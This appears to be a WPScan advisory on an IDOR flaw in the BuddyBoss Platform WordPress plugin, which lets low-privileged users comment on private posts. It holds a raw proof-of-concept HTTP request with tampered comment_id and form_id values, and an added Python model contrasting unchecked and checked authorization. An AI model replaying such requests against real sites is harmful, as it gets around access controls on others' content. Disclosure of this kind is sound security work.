wpvulndb | Faris Krivic | WPVDB-ID:76E8591F-120C-4CD7-B9A2-79F8D4D98AA8
History: May 15, 2024 - 12:00 a.m.

BuddyBoss Platform < 2.6.0 - Subscriber+ Comment on Private Post via IDOR

wpscan.com
Tags: buddyboss platform, subscriber+, idor, private post, vulnerability, comment, manipulation, poc, update

CVSS3: 4.3 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: NONE
Integrity Impact: LOW
Availability Impact: NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

AI Score: 6.3 Medium (Confidence: High)
EPSS: 0.0004 Low (Percentile: 14.1%)

Description

The plugin contains an IDOR vulnerability that allows a user to comment on a private post by manipulating the ID included in the request.

PoC

POST /wp-admin/admin-ajax.php HTTP/2
Host: online-communities.demos.buddyboss.com
Cookie: wordpress_sec_019a643733c4caf6b40a23bdf343c136=adele%7C1702662340%7CdLmTduSfxoM9xFZHKg8WhPsomZWnfZ9AygNoItpBNfs%7Cad6f4652de2481a56e68bdd28c294386fae37234e735065d6b90abd61ec052e9; _gcl_au=1.1.780899166.1702488357; _ga_YJ9BETCSZM=GS1.1.1702488357.1.1.1702489668.60.0.0; _ga=GA1.2.700400885.1702488358; _pin_unauth=dWlkPU1qWmpOVGhsTVRBdE16QmtNUzAwWVRJd0xXRmhaV1V0TURWaE1XUm1aall5WTJFeQ; _gid=GA1.2.1652937291.1702488358; psuid=9ba8f98a-a8df-4e85-be53-540ffc862ed1; ps5b7449d2840fc1452412f2fe=true|1700697600000; _fbp=fb.1.1702488359281.1942424250; ab-sandbox_019a643733c4caf6b40a23bdf343c136=66566579e92883ee8%7C256035; tk_ai=woo%3AYqcaaRyMBwKX1aMgKwlMVWzS; redux_current_tab=undefined; redux_current_tab_get=undefined; redux_current_tab_buddyboss_theme_options=undefined; tk_qs=; wordpress_test_cookie=WP%20Cookie%20check; _lscache_vary=5e5b26d2ede9d2856d58613b04cbbc5c; wordpress_logged_in_019a643733c4caf6b40a23bdf343c136=adele%7C1702662340%7CdLmTduSfxoM9xFZHKg8WhPsomZWnfZ9AygNoItpBNfs%7C6dc658c846e2a136591d87ec20e80fe6176895bdbbbafc955959dcb2f9b35889; _gat_UA-235369-35=1; _uetsid=ae00a78099dc11eeb8b089e40d4468de; _uetvid=ae008bf099dc11ee8decf552a53d469a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://online-communities.demos.buddyboss.com/members/adele/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 195
Origin: https://online-communities.demos.buddyboss.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

scope=all&nonce=2081885524&action=new_activity_comment&_wpnonce_new_activity_comment=bc95aefd23&comment_id=194628&form_id=194628&content=%3Cp%3ETHIS+SHOULD+NOT+HAPPEN%3Cbr%3E%3C%2Fp%3E&modbypass=

The vulnerability was identified in the comment_id and form_id parameters, which allowed a private post to be commented on as another user.
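The object-level authorization check whose absence makes this kind of request succeed, as an added example: a simplified Python model, not BuddyBoss code and not part of the advisory. The names Activity, STORE, can_read, comment_unchecked and comment_checked are hypothetical, and the privacy values and sample records are constructed.

```python
from dataclasses import dataclass, field

@dataclass
class Activity:
    id: int
    owner: str
    privacy: str          # constructed values: "public" or "onlyme"
    parent_id: int = 0    # 0 = top-level post, otherwise id of the thread root
    comments: list = field(default_factory=list)

# Constructed sample data: one public post and one private post by another user.
STORE = {
    100: Activity(100, "adele", "public"),
    200: Activity(200, "bob", "onlyme"),
}

def can_read(user: str, act: Activity) -> bool:
    """Visibility rule of this model: public posts, or the caller's own."""
    return act.privacy == "public" or act.owner == user

def comment_unchecked(user, form_id, comment_id, content):
    """'Before': a logged-in caller's ids are trusted as sent (the IDOR)."""
    STORE[form_id].comments.append((user, comment_id, content))
    return 200

def comment_checked(user, form_id, comment_id, content):
    """'After': resolve both ids server-side and authorize against the objects."""
    root, target = STORE.get(form_id), STORE.get(comment_id)
    if root is None or target is None:
        return 404
    # comment_id must be the thread root itself or a reply inside that thread,
    # so one readable id cannot be paired with an unrelated second id.
    if target.id != root.id and target.parent_id != root.id:
        return 400
    # A valid session and nonce prove who is asking, not what they may touch.
    if not (can_read(user, root) and can_read(user, target)):
        return 403
    root.comments.append((user, comment_id, content))
    return 201
```

The check runs on the server-side records looked up from the ids, never on values the client supplies about them.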

CPE    Name    Operator    Version
               eq          2.6.0
